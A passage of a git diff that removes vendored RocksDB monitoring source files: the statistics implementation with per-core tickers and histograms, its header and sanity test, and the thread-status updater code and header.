-  MutexLock lock(&aggregate_lock_);
-  return getHistogramImplLocked(histogramType)->ToString();
-}
-
-void StatisticsImpl::setTickerCount(uint32_t tickerType, uint64_t count) {
-  {
-    MutexLock lock(&aggregate_lock_);
-    setTickerCountLocked(tickerType, count);
-  }
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->setTickerCount(tickerType, count);
-  }
-}
-
-void StatisticsImpl::setTickerCountLocked(uint32_t tickerType, uint64_t count) {
-  assert(enable_internal_stats_ ? tickerType < INTERNAL_TICKER_ENUM_MAX
-                                : tickerType < TICKER_ENUM_MAX);
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    if (core_idx == 0) {
-      per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType] = count;
-    } else {
-      per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType] = 0;
-    }
-  }
-}
-
-uint64_t StatisticsImpl::getAndResetTickerCount(uint32_t tickerType) {
-  uint64_t sum = 0;
-  {
-    MutexLock lock(&aggregate_lock_);
-    assert(enable_internal_stats_ ? tickerType < INTERNAL_TICKER_ENUM_MAX
-                                  : tickerType < TICKER_ENUM_MAX);
-    for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-      sum +=
-          per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType].exchange(
-              0, std::memory_order_relaxed);
-    }
-  }
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->setTickerCount(tickerType, 0);
-  }
-  return sum;
-}
-
-void StatisticsImpl::recordTick(uint32_t tickerType, uint64_t count) {
-  assert(
-    enable_internal_stats_ ?
-      tickerType < INTERNAL_TICKER_ENUM_MAX :
-      tickerType < TICKER_ENUM_MAX);
-  per_core_stats_.Access()->tickers_[tickerType].fetch_add(
-      count, std::memory_order_relaxed);
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->recordTick(tickerType, count);
-  }
-}
-
-void StatisticsImpl::measureTime(uint32_t histogramType, uint64_t value) {
-  assert(
-    enable_internal_stats_ ?
-      histogramType < INTERNAL_HISTOGRAM_ENUM_MAX :
-      histogramType < HISTOGRAM_ENUM_MAX);
-  per_core_stats_.Access()->histograms_[histogramType].Add(value);
-  if (stats_ && histogramType < HISTOGRAM_ENUM_MAX) {
-    stats_->measureTime(histogramType, value);
-  }
-}
-
-Status StatisticsImpl::Reset() {
-  MutexLock lock(&aggregate_lock_);
-  for (uint32_t i = 0; i < TICKER_ENUM_MAX; ++i) {
-    setTickerCountLocked(i, 0);
-  }
-  for (uint32_t i = 0; i < HISTOGRAM_ENUM_MAX; ++i) {
-    for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-      per_core_stats_.AccessAtCore(core_idx)->histograms_[i].Clear();
-    }
-  }
-  return Status::OK();
-}
-
-namespace {
-
-// a buffer size used for temp string buffers
-const int kTmpStrBufferSize = 200;
-
-} // namespace
-
-std::string StatisticsImpl::ToString() const {
-  MutexLock lock(&aggregate_lock_);
-  std::string res;
-  res.reserve(20000);
-  for (const auto& t : TickersNameMap) {
-    if (t.first < TICKER_ENUM_MAX || enable_internal_stats_) {
-      char buffer[kTmpStrBufferSize];
-      snprintf(buffer, kTmpStrBufferSize, "%s COUNT : %" PRIu64 "\n",
-               t.second.c_str(), getTickerCountLocked(t.first));
-      res.append(buffer);
-    }
-  }
-  for (const auto& h : HistogramsNameMap) {
-    if (h.first < HISTOGRAM_ENUM_MAX || enable_internal_stats_) {
-      char buffer[kTmpStrBufferSize];
-      HistogramData hData;
-      getHistogramImplLocked(h.first)->Data(&hData);
-      snprintf(
-          buffer, kTmpStrBufferSize,
-          "%s statistics Percentiles :=> 50 : %f 95 : %f 99 : %f 100 : %f\n",
-          h.second.c_str(), hData.median, hData.percentile95,
-          hData.percentile99, hData.max);
-      res.append(buffer);
-    }
-  }
-  res.shrink_to_fit();
-  return res;
-}
-
-bool StatisticsImpl::HistEnabledForType(uint32_t type) const {
-  if (LIKELY(!enable_internal_stats_)) {
-    return type < HISTOGRAM_ENUM_MAX;
-  }
-  return true;
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/statistics.h b/thirdparty/rocksdb/monitoring/statistics.h
deleted file mode 100644
index 6e91521..0000000
--- a/thirdparty/rocksdb/monitoring/statistics.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "rocksdb/statistics.h"
-
-#include <vector>
-#include <atomic>
-#include <string>
-
-#include "monitoring/histogram.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "util/core_local.h"
-#include "util/mutexlock.h"
-
-#ifdef __clang__
-#define ROCKSDB_FIELD_UNUSED __attribute__((__unused__))
-#else
-#define ROCKSDB_FIELD_UNUSED
-#endif  // __clang__
-
-namespace rocksdb {
-
-enum TickersInternal : uint32_t {
-  INTERNAL_TICKER_ENUM_START = TICKER_ENUM_MAX,
-  INTERNAL_TICKER_ENUM_MAX
-};
-
-enum HistogramsInternal : uint32_t {
-  INTERNAL_HISTOGRAM_START = HISTOGRAM_ENUM_MAX,
-  INTERNAL_HISTOGRAM_ENUM_MAX
-};
-
-
-class StatisticsImpl : public Statistics {
- public:
-  StatisticsImpl(std::shared_ptr<Statistics> stats,
-                 bool enable_internal_stats);
-  virtual ~StatisticsImpl();
-
-  virtual uint64_t getTickerCount(uint32_t ticker_type) const override;
-  virtual void histogramData(uint32_t histogram_type,
-                             HistogramData* const data) const override;
-  std::string getHistogramString(uint32_t histogram_type) const override;
-
-  virtual void setTickerCount(uint32_t ticker_type, uint64_t count) override;
-  virtual uint64_t getAndResetTickerCount(uint32_t ticker_type) override;
-  virtual void recordTick(uint32_t ticker_type, uint64_t count) override;
-  virtual void measureTime(uint32_t histogram_type, uint64_t value) override;
-
-  virtual Status Reset() override;
-  virtual std::string ToString() const override;
-  virtual bool HistEnabledForType(uint32_t type) const override;
-
- private:
-  // If non-nullptr, forwards updates to the object pointed to by `stats_`.
-  std::shared_ptr<Statistics> stats_;
-  // TODO(ajkr): clean this up since there are no internal stats anymore
-  bool enable_internal_stats_;
-  // Synchronizes anything that operates across other cores' local data,
-  // such that operations like Reset() can be performed atomically.
-  mutable port::Mutex aggregate_lock_;
-
-  // The ticker/histogram data are stored in this structure, which we will store
-  // per-core. It is cache-aligned, so tickers/histograms belonging to different
-  // cores can never share the same cache line.
-  //
-  // Alignment attributes expand to nothing depending on the platform
-  struct StatisticsData {
-    std::atomic_uint_fast64_t tickers_[INTERNAL_TICKER_ENUM_MAX] = {{0}};
-    HistogramImpl histograms_[INTERNAL_HISTOGRAM_ENUM_MAX];
-    char
-        padding[(CACHE_LINE_SIZE -
-                 (INTERNAL_TICKER_ENUM_MAX * sizeof(std::atomic_uint_fast64_t) +
-                  INTERNAL_HISTOGRAM_ENUM_MAX * sizeof(HistogramImpl)) %
-                     CACHE_LINE_SIZE) %
-                CACHE_LINE_SIZE] ROCKSDB_FIELD_UNUSED;
-  };
-
-  static_assert(sizeof(StatisticsData) % 64 == 0, "Expected 64-byte aligned");
-
-  CoreLocalArray<StatisticsData> per_core_stats_;
-
-  uint64_t getTickerCountLocked(uint32_t ticker_type) const;
-  std::unique_ptr<HistogramImpl> getHistogramImplLocked(
-      uint32_t histogram_type) const;
-  void setTickerCountLocked(uint32_t ticker_type, uint64_t count);
-};
-
-// Utility functions
-inline void MeasureTime(Statistics* statistics, uint32_t histogram_type,
-                        uint64_t value) {
-  if (statistics) {
-    statistics->measureTime(histogram_type, value);
-  }
-}
-
-inline void RecordTick(Statistics* statistics, uint32_t ticker_type,
-                       uint64_t count = 1) {
-  if (statistics) {
-    statistics->recordTick(ticker_type, count);
-  }
-}
-
-inline void SetTickerCount(Statistics* statistics, uint32_t ticker_type,
-                           uint64_t count) {
-  if (statistics) {
-    statistics->setTickerCount(ticker_type, count);
-  }
-}
-
-}
diff --git a/thirdparty/rocksdb/monitoring/statistics_test.cc b/thirdparty/rocksdb/monitoring/statistics_test.cc
deleted file mode 100644
index 43aacde..0000000
--- a/thirdparty/rocksdb/monitoring/statistics_test.cc
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "port/stack_trace.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class StatisticsTest : public testing::Test {};
-
-// Sanity check to make sure that contents and order of TickersNameMap
-// match Tickers enum
-TEST_F(StatisticsTest, Sanity) {
-  EXPECT_EQ(static_cast<size_t>(Tickers::TICKER_ENUM_MAX),
-            TickersNameMap.size());
-
-  for (uint32_t t = 0; t < Tickers::TICKER_ENUM_MAX; t++) {
-    auto pair = TickersNameMap[static_cast<size_t>(t)];
-    ASSERT_EQ(pair.first, t) << "Miss match at " << pair.second;
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/thread_status_impl.cc b/thirdparty/rocksdb/monitoring/thread_status_impl.cc
deleted file mode 100644
index e263ce6..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_impl.cc
+++ /dev/null
@@ -1,167 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <sstream>
-
-#include "rocksdb/env.h"
-#include "rocksdb/thread_status.h"
-#include "util/string_util.h"
-#include "util/thread_operation.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-const std::string& ThreadStatus::GetThreadTypeName(
-    ThreadStatus::ThreadType thread_type) {
-  static std::string thread_type_names[NUM_THREAD_TYPES + 1] = {
-      "High Pri", "Low Pri", "User", "Unknown"};
-  if (thread_type < 0 || thread_type >= NUM_THREAD_TYPES) {
-    return thread_type_names[NUM_THREAD_TYPES];  // "Unknown"
-  }
-  return thread_type_names[thread_type];
-}
-
-const std::string& ThreadStatus::GetOperationName(
-    ThreadStatus::OperationType op_type) {
-  if (op_type < 0 || op_type >= NUM_OP_TYPES) {
-    return global_operation_table[OP_UNKNOWN].name;
-  }
-  return global_operation_table[op_type].name;
-}
-
-const std::string& ThreadStatus::GetOperationStageName(
-    ThreadStatus::OperationStage stage) {
-  if (stage < 0 || stage >= NUM_OP_STAGES) {
-    return global_op_stage_table[STAGE_UNKNOWN].name;
-  }
-  return global_op_stage_table[stage].name;
-}
-
-const std::string& ThreadStatus::GetStateName(
-    ThreadStatus::StateType state_type) {
-  if (state_type < 0 || state_type >= NUM_STATE_TYPES) {
-    return global_state_table[STATE_UNKNOWN].name;
-  }
-  return global_state_table[state_type].name;
-}
-
-const std::string ThreadStatus::MicrosToString(uint64_t micros) {
-  if (micros == 0) {
-    return "";
-  }
-  const int kBufferLen = 100;
-  char buffer[kBufferLen];
-  AppendHumanMicros(micros, buffer, kBufferLen, false);
-  return std::string(buffer);
-}
-
-const std::string& ThreadStatus::GetOperationPropertyName(
-    ThreadStatus::OperationType op_type, int i) {
-  static const std::string empty_str = "";
-  switch (op_type) {
-    case ThreadStatus::OP_COMPACTION:
-      if (i >= NUM_COMPACTION_PROPERTIES) {
-        return empty_str;
-      }
-      return compaction_operation_properties[i].name;
-    case ThreadStatus::OP_FLUSH:
-      if (i >= NUM_FLUSH_PROPERTIES) {
-        return empty_str;
-      }
-      return flush_operation_properties[i].name;
-    default:
-      return empty_str;
-  }
-}
-
-std::map<std::string, uint64_t>
-    ThreadStatus::InterpretOperationProperties(
-    ThreadStatus::OperationType op_type,
-    const uint64_t* op_properties) {
-  int num_properties;
-  switch (op_type) {
-    case OP_COMPACTION:
-      num_properties = NUM_COMPACTION_PROPERTIES;
-      break;
-    case OP_FLUSH:
-      num_properties = NUM_FLUSH_PROPERTIES;
-      break;
-    default:
-      num_properties = 0;
-  }
-
-  std::map<std::string, uint64_t> property_map;
-  for (int i = 0; i < num_properties; ++i) {
-    if (op_type == OP_COMPACTION &&
-        i == COMPACTION_INPUT_OUTPUT_LEVEL) {
-      property_map.insert(
-          {"BaseInputLevel", op_properties[i] >> 32});
-      property_map.insert(
-          {"OutputLevel", op_properties[i] % (uint64_t(1) << 32U)});
-    } else if (op_type == OP_COMPACTION &&
-               i == COMPACTION_PROP_FLAGS) {
-      property_map.insert(
-          {"IsManual", ((op_properties[i] & 2) >> 1)});
-      property_map.insert(
-          {"IsDeletion", ((op_properties[i] & 4) >> 2)});
-      property_map.insert(
-          {"IsTrivialMove", ((op_properties[i] & 8) >> 3)});
-    } else {
-      property_map.insert(
-          {GetOperationPropertyName(op_type, i), op_properties[i]});
-    }
-  }
-  return property_map;
-}
-
-
-#else
-
-const std::string& ThreadStatus::GetThreadTypeName(
-    ThreadStatus::ThreadType thread_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationName(
-    ThreadStatus::OperationType op_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationStageName(
-    ThreadStatus::OperationStage stage) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetStateName(
-    ThreadStatus::StateType state_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string ThreadStatus::MicrosToString(
-    uint64_t op_elapsed_time) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationPropertyName(
-    ThreadStatus::OperationType op_type, int i) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-std::map<std::string, uint64_t>
-    ThreadStatus::InterpretOperationProperties(
-    ThreadStatus::OperationType op_type,
-    const uint64_t* op_properties) {
-  return std::map<std::string, uint64_t>();
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater.cc b/thirdparty/rocksdb/monitoring/thread_status_updater.cc
deleted file mode 100644
index 7441c35..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater.cc
+++ /dev/null
@@ -1,349 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/thread_status_updater.h"
-#include <memory>
-#include "port/likely.h"
-#include "rocksdb/env.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-__thread ThreadStatusData* ThreadStatusUpdater::thread_status_data_ = nullptr;
-
-void ThreadStatusUpdater::RegisterThread(
-    ThreadStatus::ThreadType ttype, uint64_t thread_id) {
-  if (UNLIKELY(thread_status_data_ == nullptr)) {
-    thread_status_data_ = new ThreadStatusData();
-    thread_status_data_->thread_type = ttype;
-    thread_status_data_->thread_id = thread_id;
-    std::lock_guard<std::mutex> lck(thread_list_mutex_);
-    thread_data_set_.insert(thread_status_data_);
-  }
-
-  ClearThreadOperationProperties();
-}
-
-void ThreadStatusUpdater::UnregisterThread() {
-  if (thread_status_data_ != nullptr) {
-    std::lock_guard<std::mutex> lck(thread_list_mutex_);
-    thread_data_set_.erase(thread_status_data_);
-    delete thread_status_data_;
-    thread_status_data_ = nullptr;
-  }
-}
-
-void ThreadStatusUpdater::ResetThreadStatus() {
-  ClearThreadState();
-  ClearThreadOperation();
-  SetColumnFamilyInfoKey(nullptr);
-}
-
-void ThreadStatusUpdater::SetColumnFamilyInfoKey(
-    const void* cf_key) {
-  auto* data = Get();
-  if (data == nullptr) {
-    return;
-  }
-  // set the tracking flag based on whether cf_key is non-null or not.
-  // If enable_thread_tracking is set to false, the input cf_key
-  // would be nullptr.
-  data->enable_tracking = (cf_key != nullptr);
-  data->cf_key.store(const_cast<void*>(cf_key), std::memory_order_relaxed);
-}
-
-const void* ThreadStatusUpdater::GetColumnFamilyInfoKey() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return nullptr;
-  }
-  return data->cf_key.load(std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetThreadOperation(
-    const ThreadStatus::OperationType type) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  // NOTE: Our practice here is to set all the thread operation properties
-  //       and stage before we set thread operation, and thread operation
-  //       will be set in std::memory_order_release.  This is to ensure
-  //       whenever a thread operation is not OP_UNKNOWN, we will always
-  //       have a consistent information on its properties.
-  data->operation_type.store(type, std::memory_order_release);
-  if (type == ThreadStatus::OP_UNKNOWN) {
-    data->operation_stage.store(ThreadStatus::STAGE_UNKNOWN,
-        std::memory_order_relaxed);
-    ClearThreadOperationProperties();
-  }
-}
-
-void ThreadStatusUpdater::SetThreadOperationProperty(
-    int i, uint64_t value) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_properties[i].store(value, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::IncreaseThreadOperationProperty(
-    int i, uint64_t delta) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_properties[i].fetch_add(delta, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetOperationStartTime(const uint64_t start_time) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_start_time.store(start_time, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::ClearThreadOperation() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->operation_stage.store(ThreadStatus::STAGE_UNKNOWN,
-      std::memory_order_relaxed);
-  data->operation_type.store(
-      ThreadStatus::OP_UNKNOWN, std::memory_order_relaxed);
-  ClearThreadOperationProperties();
-}
-
-void ThreadStatusUpdater::ClearThreadOperationProperties() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  for (int i = 0; i < ThreadStatus::kNumOperationProperties; ++i) {
-    data->op_properties[i].store(0, std::memory_order_relaxed);
-  }
-}
-
-ThreadStatus::OperationStage ThreadStatusUpdater::SetThreadOperationStage(
-    ThreadStatus::OperationStage stage) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return ThreadStatus::STAGE_UNKNOWN;
-  }
-  return data->operation_stage.exchange(
-      stage, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetThreadState(
-    const ThreadStatus::StateType type) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->state_type.store(type, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::ClearThreadState() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->state_type.store(
-      ThreadStatus::STATE_UNKNOWN, std::memory_order_relaxed);
-}
-
-Status ThreadStatusUpdater::GetThreadList(
-    std::vector<ThreadStatus>* thread_list) {
-  thread_list->clear();
-  std::vector<std::shared_ptr<ThreadStatusData>> valid_list;
-  uint64_t now_micros = Env::Default()->NowMicros();
-
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  for (auto* thread_data : thread_data_set_) {
-    assert(thread_data);
-    auto thread_id = thread_data->thread_id.load(
-        std::memory_order_relaxed);
-    auto thread_type = thread_data->thread_type.load(
-        std::memory_order_relaxed);
-    // Since any change to cf_info_map requires thread_list_mutex,
-    // which is currently held by GetThreadList(), here we can safely
-    // use "memory_order_relaxed" to load the cf_key.
-    auto cf_key = thread_data->cf_key.load(
-        std::memory_order_relaxed);
-    auto iter = cf_info_map_.find(cf_key);
-    auto* cf_info = iter != cf_info_map_.end() ?
-        iter->second.get() : nullptr;
-    const std::string* db_name = nullptr;
-    const std::string* cf_name = nullptr;
-    ThreadStatus::OperationType op_type = ThreadStatus::OP_UNKNOWN;
-    ThreadStatus::OperationStage op_stage = ThreadStatus::STAGE_UNKNOWN;
-    ThreadStatus::StateType state_type = ThreadStatus::STATE_UNKNOWN;
-    uint64_t op_elapsed_micros = 0;
-    uint64_t op_props[ThreadStatus::kNumOperationProperties] = {0};
-    if (cf_info != nullptr) {
-      db_name = &cf_info->db_name;
-      cf_name = &cf_info->cf_name;
-      op_type = thread_data->operation_type.load(
-          std::memory_order_acquire);
-      // display lower-level info only when higher-level info is available.
-      if (op_type != ThreadStatus::OP_UNKNOWN) {
-        op_elapsed_micros = now_micros - thread_data->op_start_time.load(
-            std::memory_order_relaxed);
-        op_stage = thread_data->operation_stage.load(
-            std::memory_order_relaxed);
-        state_type = thread_data->state_type.load(
-            std::memory_order_relaxed);
-        for (int i = 0; i < ThreadStatus::kNumOperationProperties; ++i) {
-          op_props[i] = thread_data->op_properties[i].load(
-              std::memory_order_relaxed);
-        }
-      }
-    }
-    thread_list->emplace_back(
-        thread_id, thread_type,
-        db_name ? *db_name : "",
-        cf_name ? *cf_name : "",
-        op_type, op_elapsed_micros, op_stage, op_props,
-        state_type);
-  }
-
-  return Status::OK();
-}
-
-ThreadStatusData* ThreadStatusUpdater::GetLocalThreadStatus() {
-  if (thread_status_data_ == nullptr) {
-    return nullptr;
-  }
-  if (!thread_status_data_->enable_tracking) {
-    assert(thread_status_data_->cf_key.load(
-        std::memory_order_relaxed) == nullptr);
-    return nullptr;
-  }
-  return thread_status_data_;
-}
-
-void ThreadStatusUpdater::NewColumnFamilyInfo(
-    const void* db_key, const std::string& db_name,
-    const void* cf_key, const std::string& cf_name) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-
-  cf_info_map_[cf_key].reset(
-      new ConstantColumnFamilyInfo(db_key, db_name, cf_name));
-  db_key_map_[db_key].insert(cf_key);
-}
-
-void ThreadStatusUpdater::EraseColumnFamilyInfo(const void* cf_key) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  auto cf_pair = cf_info_map_.find(cf_key);
-  if (cf_pair == cf_info_map_.end()) {
-    return;
-  }
-
-  auto* cf_info = cf_pair->second.get();
-  assert(cf_info);
-
-  // Remove its entry from db_key_map_ by the following steps:
-  // 1. Obtain the entry in db_key_map_ whose set contains cf_key
-  // 2. Remove it from the set.
-  auto db_pair = db_key_map_.find(cf_info->db_key);
-  assert(db_pair != db_key_map_.end());
-  size_t result __attribute__((unused)) = db_pair->second.erase(cf_key);
-  assert(result);
-
-  cf_pair->second.reset();
-  result = cf_info_map_.erase(cf_key);
-  assert(result);
-}
-
-void ThreadStatusUpdater::EraseDatabaseInfo(const void* db_key) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  auto db_pair = db_key_map_.find(db_key);
-  if (UNLIKELY(db_pair == db_key_map_.end())) {
-    // In some occasional cases such as DB::Open fails, we won't
-    // register ColumnFamilyInfo for a db.
-    return;
-  }
-
-  size_t result __attribute__((unused)) = 0;
-  for (auto cf_key : db_pair->second) {
-    auto cf_pair = cf_info_map_.find(cf_key);
-    if (cf_pair == cf_info_map_.end()) {
-      continue;
-    }
-    cf_pair->second.reset();
-    result = cf_info_map_.erase(cf_key);
-    assert(result);
-  }
-  db_key_map_.erase(db_key);
-}
-
-#else
-
-void ThreadStatusUpdater::RegisterThread(
-    ThreadStatus::ThreadType ttype, uint64_t thread_id) {
-}
-
-void ThreadStatusUpdater::UnregisterThread() {
-}
-
-void ThreadStatusUpdater::ResetThreadStatus() {
-}
-
-void ThreadStatusUpdater::SetColumnFamilyInfoKey(
-    const void* cf_key) {
-}
-
-void ThreadStatusUpdater::SetThreadOperation(
-    const ThreadStatus::OperationType type) {
-}
-
-void ThreadStatusUpdater::ClearThreadOperation() {
-}
-
-void ThreadStatusUpdater::SetThreadState(
-    const ThreadStatus::StateType type) {
-}
-
-void ThreadStatusUpdater::ClearThreadState() {
-}
-
-Status ThreadStatusUpdater::GetThreadList(
-    std::vector<ThreadStatus>* thread_list) {
-  return Status::NotSupported(
-      "GetThreadList is not supported in the current running environment.");
-}
-
-void ThreadStatusUpdater::NewColumnFamilyInfo(
-    const void* db_key, const std::string& db_name,
-    const void* cf_key, const std::string& cf_name) {
-}
-
-void ThreadStatusUpdater::EraseColumnFamilyInfo(const void* cf_key) {
-}
-
-void ThreadStatusUpdater::EraseDatabaseInfo(const void* db_key) {
-}
-
-void ThreadStatusUpdater::SetThreadOperationProperty(
-    int i, uint64_t value) {
-}
-
-void ThreadStatusUpdater::IncreaseThreadOperationProperty(
-    int i, uint64_t delta) {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater.h b/thirdparty/rocksdb/monitoring/thread_status_updater.h
deleted file mode 100644
index 69b4d4f..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater.h
+++ /dev/null
@@ -1,234 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// The implementation of ThreadStatus.
-//
-// Note that we make get and set access to ThreadStatusData lockless.
-// As a result, ThreadStatusData as a whole is not atomic.  However,
-// we guarantee consistent ThreadStatusData all the time whenever
-// user call GetThreadList().  This consistency guarantee is done
-// by having the following constraint in the internal implementation
-// of set and get order:
-//
-// 1. When reset any information in ThreadStatusData, always start from
-//    clearing up the lower-level information first.
-// 2. When setting any information in ThreadStatusData, always start from
-//    setting the higher-level information.
-// 3. When returning ThreadStatusData to the user, fields are fetched from
-//    higher-level to lower-level.  In addition, where there's a nullptr
-//    in one field, then all fields that has lower-level than that field
-//    should be ignored.
-//
-// The high to low level information would be:
-// thread_id > thread_type > db > cf > operation > state
-//
-// This means user might not always get full information, but whenever
-// returned by the GetThreadList() is guaranteed to be consistent.
-#pragma once
-#include <atomic>
-#include <list>
-#include <memory>
-#include <mutex>
-#include <string>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-#include "rocksdb/status.h"
-#include "rocksdb/thread_status.h"
-#include "port/port.h"
-#include "util/thread_operation.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-
-// The structure that keeps constant information about a column family.
-struct ConstantColumnFamilyInfo {
-#ifdef ROCKSDB_USING_THREAD_STATUS
- public:
-  ConstantColumnFamilyInfo(
-      const void* _db_key,
-      const std::string& _db_name,
-      const std::string& _cf_name) :
-      db_key(_db_key), db_name(_db_name), cf_name(_cf_name) {}
-  const void* db_key;
-  const std::string db_name;
-  const std::string cf_name;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-// the internal data-structure that is used to reflect the current
-// status of a thread using a set of atomic pointers.
-struct ThreadStatusData {
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  explicit ThreadStatusData() : enable_tracking(false) {
-    thread_id.store(0);
-    thread_type.store(ThreadStatus::USER);
-    cf_key.store(nullptr);
-    operation_type.store(ThreadStatus::OP_UNKNOWN);
-    op_start_time.store(0);
-    state_type.store(ThreadStatus::STATE_UNKNOWN);
-  }
-
-  // A flag to indicate whether the thread tracking is enabled
-  // in the current thread.  This value will be updated based on whether
-  // the associated Options::enable_thread_tracking is set to true
-  // in ThreadStatusUtil::SetColumnFamily().
-  //
-  // If set to false, then SetThreadOperation and SetThreadState
-  // will be no-op.
-  bool enable_tracking;
-
-  std::atomic<uint64_t> thread_id;
-  std::atomic<ThreadStatus::ThreadType> thread_type;
-  std::atomic<void*> cf_key;
-  std::atomic<ThreadStatus::OperationType> operation_type;
-  std::atomic<uint64_t> op_start_time;
-  std::atomic<ThreadStatus::OperationStage> operation_stage;
-  std::atomic<uint64_t> op_properties[ThreadStatus::kNumOperationProperties];
-  std::atomic<ThreadStatus::StateType> state_type;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-// The class that stores and updates the status of the current thread
-// using a thread-local ThreadStatusData.
-//
-// In most of the case, you should use ThreadStatusUtil to update
-// the status of the current thread instead of using ThreadSatusUpdater
-// directly.
-//
-// @see ThreadStatusUtil
-class ThreadStatusUpdater {
- public:
-  ThreadStatusUpdater() {}
-
-  // Releases all ThreadStatusData of all active threads.
-  virtual ~ThreadStatusUpdater() {}
-
-  // Unregister the current thread.
-  void UnregisterThread();
-
-  // Reset the status of the current thread.  This includes resetting
-  // ColumnFamilyInfoKey, ThreadOperation, and ThreadState.
-  void ResetThreadStatus();
-
-  // Set the id of the current thread.
-  void SetThreadID(uint64_t thread_id);
-
-  // Register the current thread for tracking.
-  void RegisterThread(ThreadStatus::ThreadType ttype, uint64_t thread_id);
-
-  // Update the column-family info of the current thread by setting
-  // its thread-local pointer of ThreadStateInfo to the correct entry.
-  void SetColumnFamilyInfoKey(const void* cf_key);
-
-  // returns the column family info key.
-  const void* GetColumnFamilyInfoKey();
-
-  // Update the thread operation of the current thread.
